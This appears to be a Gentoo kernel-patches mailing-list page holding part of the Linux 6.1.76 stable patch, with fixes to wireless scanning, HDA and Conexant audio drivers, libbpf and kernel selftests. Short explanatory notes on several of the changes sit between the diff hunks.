+index b7e1631b3d80d..3ad4c1032c038 100644
+--- a/net/wireless/scan.c
++++ b/net/wireless/scan.c
+@@ -1810,8 +1810,12 @@ cfg80211_bss_update(struct cfg80211_registered_device *rdev,
+ 				list_add(&new->hidden_list,
+ 					 &hidden->hidden_list);
+ 				hidden->refcount++;
++
++				ies = (void *)rcu_access_pointer(new->pub.beacon_ies);
+ 				rcu_assign_pointer(new->pub.beacon_ies,
+ 						   hidden->pub.beacon_ies);
++				if (ies)
++					kfree_rcu(ies, rcu_head);
+ 			}
+ 		} else {
+ 			/*
+diff --git a/sound/hda/hdac_stream.c b/sound/hda/hdac_stream.c
+index 741a5d17ae4cb..ecd3aec57c87b 100644
+--- a/sound/hda/hdac_stream.c
++++ b/sound/hda/hdac_stream.c
+@@ -629,17 +629,15 @@ void snd_hdac_stream_timecounter_init(struct hdac_stream *azx_dev,
+ 	struct hdac_stream *s;
+ 	bool inited = false;
+ 	u64 cycle_last = 0;
+-	int i = 0;
+ 
+ 	list_for_each_entry(s, &bus->stream_list, list) {
+-		if (streams & (1 << i)) {
++		if ((streams & (1 << s->index))) {
+ 			azx_timecounter_init(s, inited, cycle_last);
+ 			if (!inited) {
+ 				inited = true;
+ 				cycle_last = s->tc.cycle_last;
+ 			}
+ 		}
+-		i++;
+ 	}
+ 
+ 	snd_pcm_gettime(runtime, &runtime->trigger_tstamp);
+@@ -684,14 +682,13 @@ void snd_hdac_stream_sync(struct hdac_stream *azx_dev, bool start,
+ 			  unsigned int streams)
+ {
+ 	struct hdac_bus *bus = azx_dev->bus;
+-	int i, nwait, timeout;
++	int nwait, timeout;
+ 	struct hdac_stream *s;
+ 
+ 	for (timeout = 5000; timeout; timeout--) {
+ 		nwait = 0;
+-		i = 0;
+ 		list_for_each_entry(s, &bus->stream_list, list) {
+-			if (!(streams & (1 << i++)))
++			if (!(streams & (1 << s->index)))
+ 				continue;
+ 
+ 			if (start) {
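
The hdac_stream change drops the hand-maintained counter because nothing
guarantees bus->stream_list is ordered by hardware stream index; keying the
bitmask test on s->index makes the match explicit. The resulting shape,
sketched with a placeholder body:

        list_for_each_entry(s, &bus->stream_list, list) {
                if (!(streams & BIT(s->index)))  /* key by hardware index */
                        continue;
                /* ...operate on this stream... */
        }
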
+diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c
+index 5aaf3dcecf27e..a26f2a2d44cf2 100644
+--- a/sound/pci/hda/hda_intel.c
++++ b/sound/pci/hda/hda_intel.c
+@@ -2549,6 +2549,8 @@ static const struct pci_device_id azx_ids[] = {
+ 	/* Lunarlake-P */
+ 	{ PCI_DEVICE(0x8086, 0xa828),
+ 	  .driver_data = AZX_DRIVER_SKL | AZX_DCAPS_INTEL_SKYLAKE},
++	/* Arrow Lake */
++	{ PCI_DEVICE_DATA(INTEL, HDA_ARL, AZX_DRIVER_SKL | AZX_DCAPS_INTEL_SKYLAKE) },
+ 	/* Broxton-P(Apollolake) */
+ 	{ PCI_DEVICE(0x8086, 0x5a98),
+ 	  .driver_data = AZX_DRIVER_SKL | AZX_DCAPS_INTEL_BROXTON },
+diff --git a/sound/pci/hda/patch_conexant.c b/sound/pci/hda/patch_conexant.c
+index a889cccdd607c..e8819e8a98763 100644
+--- a/sound/pci/hda/patch_conexant.c
++++ b/sound/pci/hda/patch_conexant.c
+@@ -21,6 +21,12 @@
+ #include "hda_jack.h"
+ #include "hda_generic.h"
+ 
++enum {
++	CX_HEADSET_NOPRESENT = 0,
++	CX_HEADSET_PARTPRESENT,
++	CX_HEADSET_ALLPRESENT,
++};
++
+ struct conexant_spec {
+ 	struct hda_gen_spec gen;
+ 
+@@ -42,7 +48,8 @@ struct conexant_spec {
+ 	unsigned int gpio_led;
+ 	unsigned int gpio_mute_led_mask;
+ 	unsigned int gpio_mic_led_mask;
+-
++	unsigned int headset_present_flag;
++	bool is_cx8070_sn6140;
+ };
+ 
+ 
+@@ -164,6 +171,27 @@ static void cxt_init_gpio_led(struct hda_codec *codec)
+ 	}
+ }
+ 
++static void cx_fixup_headset_recog(struct hda_codec *codec)
++{
++	unsigned int mic_persent;
++
++	/* fix headset type detection failures with some headsets, such as EDIFIER */
++	/* set micbiasd output current comparator threshold from 66% to 55%. */
++	snd_hda_codec_write(codec, 0x1c, 0, 0x320, 0x010);
++	/* set OFF voltage for DFET from -1.2V to -0.8V, set headset micbias resistor
++	 * value adjustment trim from 2.2K ohms to 2.0K ohms.
++	 */
++	snd_hda_codec_write(codec, 0x1c, 0, 0x3b0, 0xe10);
++	/* fix headset type detection failure after reboot */
++	mic_persent = snd_hda_codec_read(codec, 0x19, 0, AC_VERB_GET_PIN_SENSE, 0x0);
++	if (mic_persent & AC_PINSENSE_PRESENCE)
++		/* enable headset mic VREF */
++		snd_hda_codec_write(codec, 0x19, 0, AC_VERB_SET_PIN_WIDGET_CONTROL, 0x24);
++	else
++		/* disable headset mic VREF */
++		snd_hda_codec_write(codec, 0x19, 0, AC_VERB_SET_PIN_WIDGET_CONTROL, 0x20);
++}
++
+ static int cx_auto_init(struct hda_codec *codec)
+ {
+ 	struct conexant_spec *spec = codec->spec;
+@@ -174,6 +202,9 @@ static int cx_auto_init(struct hda_codec *codec)
+ 	cxt_init_gpio_led(codec);
+ 	snd_hda_apply_fixup(codec, HDA_FIXUP_ACT_INIT);
+ 
++	if (spec->is_cx8070_sn6140)
++		cx_fixup_headset_recog(codec);
++
+ 	return 0;
+ }
+ 
+@@ -192,6 +223,77 @@ static void cx_auto_free(struct hda_codec *codec)
+ 	snd_hda_gen_free(codec);
+ }
+ 
++static void cx_process_headset_plugin(struct hda_codec *codec)
++{
++	unsigned int val;
++	unsigned int count = 0;
++
++	/* Wait until headset type detection completes. */
++	do {
++		val = snd_hda_codec_read(codec, 0x1c, 0, 0xca0, 0x0);
++		if (val & 0x080) {
++			codec_dbg(codec, "headset type detect done!\n");
++			break;
++		}
++		msleep(20);
++		count++;
++	} while (count < 3);
++	val = snd_hda_codec_read(codec, 0x1c, 0, 0xcb0, 0x0);
++	if (val & 0x800) {
++		codec_dbg(codec, "headset plugin, type is CTIA\n");
++		snd_hda_codec_write(codec, 0x19, 0, AC_VERB_SET_PIN_WIDGET_CONTROL, 0x24);
++	} else if (val & 0x400) {
++		codec_dbg(codec, "headset plugin, type is OMTP\n");
++		snd_hda_codec_write(codec, 0x19, 0, AC_VERB_SET_PIN_WIDGET_CONTROL, 0x24);
++	} else {
++		codec_dbg(codec, "headphone plugin\n");
++	}
++}
++
++static void cx_update_headset_mic_vref(struct hda_codec *codec, unsigned int res)
++{
++	unsigned int phone_present, mic_persent, phone_tag, mic_tag;
++	struct conexant_spec *spec = codec->spec;
++
++	/* In cx8070 and sn6140, node 16 can only be configured as headphone or disabled,
++	 * and node 19 can only be configured as microphone or disabled.
++	 * Check the hp & mic tags to handle headset plug-in and plug-out.
++	 */
++	phone_tag = snd_hda_codec_read(codec, 0x16, 0, AC_VERB_GET_UNSOLICITED_RESPONSE, 0x0);
++	mic_tag = snd_hda_codec_read(codec, 0x19, 0, AC_VERB_GET_UNSOLICITED_RESPONSE, 0x0);
++	if ((phone_tag & (res >> AC_UNSOL_RES_TAG_SHIFT)) ||
++	    (mic_tag & (res >> AC_UNSOL_RES_TAG_SHIFT))) {
++		phone_present = snd_hda_codec_read(codec, 0x16, 0, AC_VERB_GET_PIN_SENSE, 0x0);
++		if (!(phone_present & AC_PINSENSE_PRESENCE)) { /* headphone plug-out */
++			spec->headset_present_flag = CX_HEADSET_NOPRESENT;
++			snd_hda_codec_write(codec, 0x19, 0, AC_VERB_SET_PIN_WIDGET_CONTROL, 0x20);
++			return;
++		}
++		if (spec->headset_present_flag == CX_HEADSET_NOPRESENT) {
++			spec->headset_present_flag = CX_HEADSET_PARTPRESENT;
++		} else if (spec->headset_present_flag == CX_HEADSET_PARTPRESENT) {
++			mic_persent = snd_hda_codec_read(codec, 0x19, 0,
++							 AC_VERB_GET_PIN_SENSE, 0x0);
++			/* headset is present */
++			if ((phone_present & AC_PINSENSE_PRESENCE) &&
++			    (mic_persent & AC_PINSENSE_PRESENCE)) {
++				cx_process_headset_plugin(codec);
++				spec->headset_present_flag = CX_HEADSET_ALLPRESENT;
++			}
++		}
++	}
++}
++
++static void cx_jack_unsol_event(struct hda_codec *codec, unsigned int res)
++{
++	struct conexant_spec *spec = codec->spec;
++
++	if (spec->is_cx8070_sn6140)
++		cx_update_headset_mic_vref(codec, res);
++
++	snd_hda_jack_unsol_event(codec, res);
++}
++
+ #ifdef CONFIG_PM
+ static int cx_auto_suspend(struct hda_codec *codec)
+ {
+@@ -205,7 +307,7 @@ static const struct hda_codec_ops cx_auto_patch_ops = {
+ 	.build_pcms = snd_hda_gen_build_pcms,
+ 	.init = cx_auto_init,
+ 	.free = cx_auto_free,
+-	.unsol_event = snd_hda_jack_unsol_event,
++	.unsol_event = cx_jack_unsol_event,
+ #ifdef CONFIG_PM
+ 	.suspend = cx_auto_suspend,
+ 	.check_power_status = snd_hda_gen_check_power_status,
+@@ -1042,6 +1144,15 @@ static int patch_conexant_auto(struct hda_codec *codec)
+ 	codec->spec = spec;
+ 	codec->patch_ops = cx_auto_patch_ops;
+ 
++	/* init cx8070/sn6140 flag and reset headset_present_flag */
++	switch (codec->core.vendor_id) {
++	case 0x14f11f86:
++	case 0x14f11f87:
++		spec->is_cx8070_sn6140 = true;
++		spec->headset_present_flag = CX_HEADSET_NOPRESENT;
++		break;
++	}
++
+ 	cx_auto_parse_eapd(codec);
+ 	spec->gen.own_eapd_ctl = 1;
+ 
+diff --git a/sound/soc/amd/acp-config.c b/sound/soc/amd/acp-config.c
+index 0932473b63945..9ee71a99a0871 100644
+--- a/sound/soc/amd/acp-config.c
++++ b/sound/soc/amd/acp-config.c
+@@ -3,7 +3,7 @@
+ // This file is provided under a dual BSD/GPLv2 license. When using or
+ // redistributing this file, you may do so under either license.
+ //
+-// Copyright(c) 2021 Advanced Micro Devices, Inc.
++// Copyright(c) 2021, 2023 Advanced Micro Devices, Inc.
+ //
+ // Authors: Ajit Kumar Pandey <AjitKumar.Pandey@amd.com>
+ //
+@@ -35,6 +35,19 @@ static const struct config_entry config_table[] = {
+ 			{}
+ 		},
+ 	},
++	{
++		.flags = FLAG_AMD_LEGACY,
++		.device = ACP_PCI_DEV_ID,
++		.dmi_table = (const struct dmi_system_id []) {
++			{
++				.matches = {
++					DMI_MATCH(DMI_SYS_VENDOR, "Valve"),
++					DMI_MATCH(DMI_PRODUCT_NAME, "Jupiter"),
++				},
++			},
++			{}
++		},
++	},
+ 	{
+ 		.flags = FLAG_AMD_SOF,
+ 		.device = ACP_PCI_DEV_ID,
+diff --git a/sound/soc/codecs/lpass-wsa-macro.c b/sound/soc/codecs/lpass-wsa-macro.c
+index 2ccc68513f7c1..bb9de5767ebcd 100644
+--- a/sound/soc/codecs/lpass-wsa-macro.c
++++ b/sound/soc/codecs/lpass-wsa-macro.c
+@@ -1581,7 +1581,6 @@ static int wsa_macro_enable_interpolator(struct snd_soc_dapm_widget *w,
+ 	u16 gain_reg;
+ 	u16 reg;
+ 	int val;
+-	int offset_val = 0;
+ 	struct wsa_macro *wsa = snd_soc_component_get_drvdata(component);
+ 
+ 	if (w->shift == WSA_MACRO_COMP1) {
+@@ -1620,10 +1619,8 @@ static int wsa_macro_enable_interpolator(struct snd_soc_dapm_widget *w,
+ 					CDC_WSA_RX1_RX_PATH_MIX_SEC0,
+ 					CDC_WSA_RX_PGA_HALF_DB_MASK,
+ 					CDC_WSA_RX_PGA_HALF_DB_ENABLE);
+-			offset_val = -2;
+ 		}
+ 		val = snd_soc_component_read(component, gain_reg);
+-		val += offset_val;
+ 		snd_soc_component_write(component, gain_reg, val);
+ 		wsa_macro_config_ear_spkr_gain(component, wsa,
+ 						event, gain_reg);
+@@ -1651,10 +1648,6 @@ static int wsa_macro_enable_interpolator(struct snd_soc_dapm_widget *w,
+ 					CDC_WSA_RX1_RX_PATH_MIX_SEC0,
+ 					CDC_WSA_RX_PGA_HALF_DB_MASK,
+ 					CDC_WSA_RX_PGA_HALF_DB_DISABLE);
+-			offset_val = 2;
+-			val = snd_soc_component_read(component, gain_reg);
+-			val += offset_val;
+-			snd_soc_component_write(component, gain_reg, val);
+ 		}
+ 		wsa_macro_config_ear_spkr_gain(component, wsa,
+ 						event, gain_reg);
+diff --git a/sound/soc/codecs/wsa883x.c b/sound/soc/codecs/wsa883x.c
+index b152f4e5c4f2b..cd96c35a150c8 100644
+--- a/sound/soc/codecs/wsa883x.c
++++ b/sound/soc/codecs/wsa883x.c
+@@ -1102,7 +1102,11 @@ static int wsa_dev_mode_put(struct snd_kcontrol *kcontrol,
+ 	return 1;
+ }
+ 
+-static const DECLARE_TLV_DB_SCALE(pa_gain, -300, 150, -300);
++static const SNDRV_CTL_TLVD_DECLARE_DB_RANGE(pa_gain,
++	0, 14, TLV_DB_SCALE_ITEM(-300, 0, 0),
++	15, 29, TLV_DB_SCALE_ITEM(-300, 150, 0),
++	30, 31, TLV_DB_SCALE_ITEM(1800, 0, 0),
++);
+ 
+ static int wsa883x_get_swr_port(struct snd_kcontrol *kcontrol,
+ 				struct snd_ctl_elem_value *ucontrol)
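
The dB math behind the wsa883x change: the old single DECLARE_TLV_DB_SCALE
claimed -3 dB plus 1.5 dB per register step across the whole 0..31 range,
topping out at an impossible +43.5 dB. Hand-working the new range macro's
arguments gives the piecewise mapping the new table advertises:

        register  0..14  ->  fixed at -3.00 dB
        register 15..29  ->  -3.00 dB up to +18.00 dB, in 1.5 dB steps
        register 30..31  ->  fixed at +18.00 dB
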
+diff --git a/tools/build/feature/test-libopencsd.c b/tools/build/feature/test-libopencsd.c
+index eb6303ff446ed..4cfcef9da3e43 100644
+--- a/tools/build/feature/test-libopencsd.c
++++ b/tools/build/feature/test-libopencsd.c
+@@ -4,9 +4,9 @@
+ /*
+  * Check OpenCSD library version is sufficient to provide required features
+  */
+-#define OCSD_MIN_VER ((1 << 16) | (1 << 8) | (1))
++#define OCSD_MIN_VER ((1 << 16) | (2 << 8) | (1))
+ #if !defined(OCSD_VER_NUM) || (OCSD_VER_NUM < OCSD_MIN_VER)
+-#error "OpenCSD >= 1.1.1 is required"
++#error "OpenCSD >= 1.2.1 is required"
+ #endif
+ 
+ int main(void)
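
The OpenCSD version check packs major.minor.patch one byte apiece, so the
bump decodes as (a worked encoding):

        /* OCSD_MIN_VER = (major << 16) | (minor << 8) | patch */
        old: (1 << 16) | (1 << 8) | 1 = 0x010101  ->  v1.1.1
        new: (1 << 16) | (2 << 8) | 1 = 0x010201  ->  v1.2.1
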
+diff --git a/tools/lib/bpf/libbpf.c b/tools/lib/bpf/libbpf.c
+index 10f15a3e3a95e..e2014b1250ea2 100644
+--- a/tools/lib/bpf/libbpf.c
++++ b/tools/lib/bpf/libbpf.c
+@@ -4157,6 +4157,8 @@ bpf_object__collect_prog_relos(struct bpf_object *obj, Elf64_Shdr *shdr, Elf_Dat
+ 
+ 	scn = elf_sec_by_idx(obj, sec_idx);
+ 	scn_data = elf_sec_data(obj, scn);
++	if (!scn_data)
++		return -LIBBPF_ERRNO__FORMAT;
+ 
+ 	relo_sec_name = elf_sec_str(obj, shdr->sh_name);
+ 	sec_name = elf_sec_name(obj, scn);
+diff --git a/tools/lib/subcmd/help.c b/tools/lib/subcmd/help.c
+index bf02d62a3b2b5..42f57b640f119 100644
+--- a/tools/lib/subcmd/help.c
++++ b/tools/lib/subcmd/help.c
+@@ -50,11 +50,21 @@ void uniq(struct cmdnames *cmds)
+ 	if (!cmds->cnt)
+ 		return;
+ 
+-	for (i = j = 1; i < cmds->cnt; i++)
+-		if (strcmp(cmds->names[i]->name, cmds->names[i-1]->name))
+-			cmds->names[j++] = cmds->names[i];
+-
++	for (i = 1; i < cmds->cnt; i++) {
++		if (!strcmp(cmds->names[i]->name, cmds->names[i-1]->name))
++			zfree(&cmds->names[i - 1]);
++	}
++	for (i = 0, j = 0; i < cmds->cnt; i++) {
++		if (cmds->names[i]) {
++			if (i == j)
++				j++;
++			else
++				cmds->names[j++] = cmds->names[i];
++		}
++	}
+ 	cmds->cnt = j;
++	while (j < i)
++		cmds->names[j++] = NULL;
+ }
+ 
+ void exclude_cmds(struct cmdnames *cmds, struct cmdnames *excludes)
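
The rewritten uniq() fixes a quiet leak: the old single-pass compaction skipped
duplicate entries but never freed them. A worked example of the two passes,
assuming the sorted input the function requires:

        /* input:  names = { "add", "add", "del" }, cnt = 3
         * pass 1: zfree()s the earlier slot of each duplicate pair
         *           -> { NULL, "add", "del" }
         * pass 2: compacts survivors to the front and NULLs the tail
         *           -> { "add", "del", NULL }, cnt = 2
         */
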
+diff --git a/tools/testing/selftests/bpf/cgroup_helpers.c b/tools/testing/selftests/bpf/cgroup_helpers.c
+index e914cc45b7669..6f00bee917a0b 100644
+--- a/tools/testing/selftests/bpf/cgroup_helpers.c
++++ b/tools/testing/selftests/bpf/cgroup_helpers.c
+@@ -467,10 +467,20 @@ int setup_classid_environment(void)
+ 		return 1;
+ 	}
+ 
+-	if (mount("net_cls", NETCLS_MOUNT_PATH, "cgroup", 0, "net_cls") &&
+-	    errno != EBUSY) {
+-		log_err("mount cgroup net_cls");
+-		return 1;
++	if (mount("net_cls", NETCLS_MOUNT_PATH, "cgroup", 0, "net_cls")) {
++		if (errno != EBUSY) {
++			log_err("mount cgroup net_cls");
++			return 1;
++		}
++
++		if (rmdir(NETCLS_MOUNT_PATH)) {
++			log_err("rmdir cgroup net_cls");
++			return 1;
++		}
++		if (umount(CGROUP_MOUNT_DFLT)) {
++			log_err("umount cgroup base");
++			return 1;
++		}
+ 	}
+ 
+ 	cleanup_classid_environment();
+diff --git a/tools/testing/selftests/bpf/prog_tests/btf.c b/tools/testing/selftests/bpf/prog_tests/btf.c
+index d711f4bea98ea..47cb753ef1e3a 100644
+--- a/tools/testing/selftests/bpf/prog_tests/btf.c
++++ b/tools/testing/selftests/bpf/prog_tests/btf.c
+@@ -5211,6 +5211,7 @@ static size_t get_pprint_mapv_size(enum pprint_mapv_kind_t mapv_kind)
+ #endif
+ 
+ 	assert(0);
++	return 0;
+ }
+ 
+ static void set_pprint_mapv(enum pprint_mapv_kind_t mapv_kind,
+diff --git a/tools/testing/selftests/bpf/progs/pyperf180.c b/tools/testing/selftests/bpf/progs/pyperf180.c
+index c39f559d3100e..42c4a8b62e360 100644
+--- a/tools/testing/selftests/bpf/progs/pyperf180.c
++++ b/tools/testing/selftests/bpf/progs/pyperf180.c
+@@ -1,4 +1,26 @@
+ // SPDX-License-Identifier: GPL-2.0
+ // Copyright (c) 2019 Facebook
+ #define STACK_MAX_LEN 180
++
++/* llvm upstream commit at clang18
++ *   https://github.com/llvm/llvm-project/commit/1a2e77cf9e11dbf56b5720c607313a566eebb16e
++ * changed inlining behavior and caused a compilation failure: some branch
++ * target distances exceeded the 16-bit representation, which is the maximum
++ * for cpu v1/v2/v3. Macro __BPF_CPU_VERSION__ is later implemented in clang18
++ * to specify which cpu version is used for compilation. So a smaller
++ * unroll_count can be set if __BPF_CPU_VERSION__ is less than 4, which
++ * reduced some branch target distances and resolved the compilation failure.
++ *
++ * To capture the case where a developer/ci uses clang18 but the corresponding
++ * repo checkpoint does not have __BPF_CPU_VERSION__, a smaller unroll_count
++ * will be set as well to prevent potential compilation failures.
++ */
++#ifdef __BPF_CPU_VERSION__
++#if __BPF_CPU_VERSION__ < 4
++#define UNROLL_COUNT 90
++#endif
++#elif __clang_major__ == 18
++#define UNROLL_COUNT 90
++#endif
++
+ #include "pyperf.h"
+diff --git a/tools/testing/selftests/drivers/net/bonding/lag_lib.sh b/tools/testing/selftests/drivers/net/bonding/lag_lib.sh
+index 16c7fb858ac10..696ef9bf3afc4 100644
+--- a/tools/testing/selftests/drivers/net/bonding/lag_lib.sh
++++ b/tools/testing/selftests/drivers/net/bonding/lag_lib.sh
+@@ -46,6 +46,17 @@ test_LAG_cleanup()
+ 	ip link add mv0 link "$name" up address "$ucaddr" type macvlan
+ 	# Used to test dev->mc handling
+ 	ip address add "$addr6" dev "$name"
++
++	# Check that addresses were added as expected
++	(grep_bridge_fdb "$ucaddr" bridge fdb show dev dummy1 ||
++		grep_bridge_fdb "$ucaddr" bridge fdb show dev dummy2) >/dev/null
++	check_err $? "macvlan unicast address not found on a slave"
++
++	# mcaddr is added asynchronously by addrconf_dad_work(), use busywait
++	(busywait 10000 grep_bridge_fdb "$mcaddr" bridge fdb show dev dummy1 ||
++		grep_bridge_fdb "$mcaddr" bridge fdb show dev dummy2) >/dev/null
++	check_err $? "IPv6 solicited-node multicast mac address not found on a slave"
++
+ 	ip link set dev "$name" down
+ 	ip link del "$name"
+ 
+diff --git a/tools/testing/selftests/drivers/net/team/config b/tools/testing/selftests/drivers/net/team/config
+index 265b6882cc21e..b5e3a3aad4bfb 100644
+--- a/tools/testing/selftests/drivers/net/team/config
++++ b/tools/testing/selftests/drivers/net/team/config
+@@ -1,3 +1,5 @@
++CONFIG_DUMMY=y
++CONFIG_IPV6=y
++CONFIG_MACVLAN=y
+ CONFIG_NET_TEAM=y
+ CONFIG_NET_TEAM_MODE_LOADBALANCE=y
+-CONFIG_MACVLAN=y
+diff --git a/tools/testing/selftests/net/config b/tools/testing/selftests/net/config
+index bd89198cd8176..ec097f2457265 100644
+--- a/tools/testing/selftests/net/config
++++ b/tools/testing/selftests/net/config
+@@ -13,6 +13,7 @@ CONFIG_IPV6_VTI=y
+ CONFIG_DUMMY=y
+ CONFIG_BRIDGE=y
+ CONFIG_VLAN_8021Q=y
++CONFIG_GENEVE=m
+ CONFIG_IFB=y
+ CONFIG_NETFILTER=y
+ CONFIG_NETFILTER_ADVANCED=y
+diff --git a/tools/testing/selftests/net/pmtu.sh b/tools/testing/selftests/net/pmtu.sh
+index 0d705fdcf3b76..1b6e484e586dc 100755
+--- a/tools/testing/selftests/net/pmtu.sh
++++ b/tools/testing/selftests/net/pmtu.sh
+@@ -713,23 +713,23 @@ setup_xfrm6() {
+ }
+ 
+ setup_xfrm4udp() {
+-	setup_xfrm 4 ${veth4_a_addr} ${veth4_b_addr} "encap espinudp 4500 4500 0.0.0.0"
+-	setup_nettest_xfrm 4 4500
++	setup_xfrm 4 ${veth4_a_addr} ${veth4_b_addr} "encap espinudp 4500 4500 0.0.0.0" && \
++		setup_nettest_xfrm 4 4500
+ }
+ 
+ setup_xfrm6udp() {
+-	setup_xfrm 6 ${veth6_a_addr} ${veth6_b_addr} "encap espinudp 4500 4500 0.0.0.0"
+-	setup_nettest_xfrm 6 4500
++	setup_xfrm 6 ${veth6_a_addr} ${veth6_b_addr} "encap espinudp 4500 4500 0.0.0.0" && \
++		setup_nettest_xfrm 6 4500
+ }
+ 
+ setup_xfrm4udprouted() {
+-	setup_xfrm 4 ${prefix4}.${a_r1}.1 ${prefix4}.${b_r1}.1 "encap espinudp 4500 4500 0.0.0.0"
+-	setup_nettest_xfrm 4 4500
++	setup_xfrm 4 ${prefix4}.${a_r1}.1 ${prefix4}.${b_r1}.1 "encap espinudp 4500 4500 0.0.0.0" && \
++		setup_nettest_xfrm 4 4500
+ }
+ 
+ setup_xfrm6udprouted() {
+-	setup_xfrm 6 ${prefix6}:${a_r1}::1 ${prefix6}:${b_r1}::1 "encap espinudp 4500 4500 0.0.0.0"
+-	setup_nettest_xfrm 6 4500
++	setup_xfrm 6 ${prefix6}:${a_r1}::1 ${prefix6}:${b_r1}::1 "encap espinudp 4500 4500 0.0.0.0" && \
++		setup_nettest_xfrm 6 4500
+ }
+ 
+ setup_routing_old() {
+diff --git a/tools/testing/selftests/net/setup_veth.sh b/tools/testing/selftests/net/setup_veth.sh
+index 1003ddf7b3b26..227fd1076f213 100644
+--- a/tools/testing/selftests/net/setup_veth.sh
++++ b/tools/testing/selftests/net/setup_veth.sh
+@@ -8,7 +8,7 @@ setup_veth_ns() {
+ 	local -r ns_mac="$4"
+ 
+ 	[[ -e /var/run/netns/"${ns_name}" ]] || ip netns add "${ns_name}"
+-	echo 100000 > "/sys/class/net/${ns_dev}/gro_flush_timeout"
++	echo 1000000 > "/sys/class/net/${ns_dev}/gro_flush_timeout"
+ 	ip link set dev "${ns_dev}" netns "${ns_name}" mtu 65535
+ 	ip -netns "${ns_name}" link set dev "${ns_dev}" up
+ 
+diff --git a/tools/testing/selftests/sgx/test_encl.lds b/tools/testing/selftests/sgx/test_encl.lds
+index a1ec64f7d91fc..108bc11d1d8c5 100644
+--- a/tools/testing/selftests/sgx/test_encl.lds
++++ b/tools/testing/selftests/sgx/test_encl.lds
+@@ -34,8 +34,4 @@ SECTIONS
+ 	}
+ }
+ 
+-ASSERT(!DEFINED(.altinstructions), "ALTERNATIVES are not supported in enclaves")
+-ASSERT(!DEFINED(.altinstr_replacement), "ALTERNATIVES are not supported in enclaves")
+-ASSERT(!DEFINED(.discard.retpoline_safe), "RETPOLINE ALTERNATIVES are not supported in enclaves")
+-ASSERT(!DEFINED(.discard.nospec), "RETPOLINE ALTERNATIVES are not supported in enclaves")
+-ASSERT(!DEFINED(.got.plt), "Libcalls are not supported in enclaves")
++ASSERT(!DEFINED(_GLOBAL_OFFSET_TABLE_), "Libcalls through GOT are not supported in enclaves")


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-02-01  1:23 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-02-01  1:23 UTC (permalink / raw
  To: gentoo-commits

commit:     ae167afbf0fcfb7bc30848bf0ff766a7f004c6a7
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Feb  1 01:23:29 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Feb  1 01:23:29 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=ae167afb

Linux patch 6.1.76

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1075_linux-6.1.76.patch | 8801 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 8805 insertions(+)

diff --git a/0000_README b/0000_README
index 8ba5f5b4..a50e0cff 100644
--- a/0000_README
+++ b/0000_README
@@ -343,6 +343,10 @@ Patch:  1074_linux-6.1.75.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.75
 
+Patch:  1075_linux-6.1.76.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.76
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1075_linux-6.1.76.patch b/1075_linux-6.1.76.patch
new file mode 100644
index 00000000..7ee4e671
--- /dev/null
+++ b/1075_linux-6.1.76.patch
@@ -0,0 +1,8801 @@
+diff --git a/Documentation/ABI/testing/sysfs-class-devfreq b/Documentation/ABI/testing/sysfs-class-devfreq
+index 5e6b74f304062..1e7e0bb4c14ec 100644
+--- a/Documentation/ABI/testing/sysfs-class-devfreq
++++ b/Documentation/ABI/testing/sysfs-class-devfreq
+@@ -52,6 +52,9 @@ Description:
+ 
+ 			echo 0 > /sys/class/devfreq/.../trans_stat
+ 
++		If the transition table is bigger than PAGE_SIZE, reading
++		this will return an -EFBIG error.
++
+ What:		/sys/class/devfreq/.../available_frequencies
+ Date:		October 2012
+ Contact:	Nishanth Menon <nm@ti.com>
+diff --git a/Documentation/admin-guide/abi-obsolete.rst b/Documentation/admin-guide/abi-obsolete.rst
+index d095867899c59..594e697aa1b2f 100644
+--- a/Documentation/admin-guide/abi-obsolete.rst
++++ b/Documentation/admin-guide/abi-obsolete.rst
+@@ -7,5 +7,5 @@ marked to be removed at some later point in time.
+ The description of the interface will document the reason why it is
+ obsolete and when it can be expected to be removed.
+ 
+-.. kernel-abi:: $srctree/Documentation/ABI/obsolete
++.. kernel-abi:: ABI/obsolete
+    :rst:
+diff --git a/Documentation/admin-guide/abi-removed.rst b/Documentation/admin-guide/abi-removed.rst
+index f7e9e43023c13..f9e000c81828e 100644
+--- a/Documentation/admin-guide/abi-removed.rst
++++ b/Documentation/admin-guide/abi-removed.rst
+@@ -1,5 +1,5 @@
+ ABI removed symbols
+ ===================
+ 
+-.. kernel-abi:: $srctree/Documentation/ABI/removed
++.. kernel-abi:: ABI/removed
+    :rst:
+diff --git a/Documentation/admin-guide/abi-stable.rst b/Documentation/admin-guide/abi-stable.rst
+index 70490736e0d30..fc3361d847b12 100644
+--- a/Documentation/admin-guide/abi-stable.rst
++++ b/Documentation/admin-guide/abi-stable.rst
+@@ -10,5 +10,5 @@ for at least 2 years.
+ Most interfaces (like syscalls) are expected to never change and always
+ be available.
+ 
+-.. kernel-abi:: $srctree/Documentation/ABI/stable
++.. kernel-abi:: ABI/stable
+    :rst:
+diff --git a/Documentation/admin-guide/abi-testing.rst b/Documentation/admin-guide/abi-testing.rst
+index b205b16a72d08..19767926b3440 100644
+--- a/Documentation/admin-guide/abi-testing.rst
++++ b/Documentation/admin-guide/abi-testing.rst
+@@ -16,5 +16,5 @@ Programs that use these interfaces are strongly encouraged to add their
+ name to the description of these interfaces, so that the kernel
+ developers can easily notify them if any changes occur.
+ 
+-.. kernel-abi:: $srctree/Documentation/ABI/testing
++.. kernel-abi:: ABI/testing
+    :rst:
+diff --git a/Documentation/filesystems/directory-locking.rst b/Documentation/filesystems/directory-locking.rst
+index dccd61c7c5c3b..193c22687851a 100644
+--- a/Documentation/filesystems/directory-locking.rst
++++ b/Documentation/filesystems/directory-locking.rst
+@@ -22,13 +22,16 @@ exclusive.
+ 3) object removal.  Locking rules: caller locks parent, finds victim,
+ locks victim and calls the method.  Locks are exclusive.
+ 
+-4) rename() that is _not_ cross-directory.  Locking rules: caller locks the
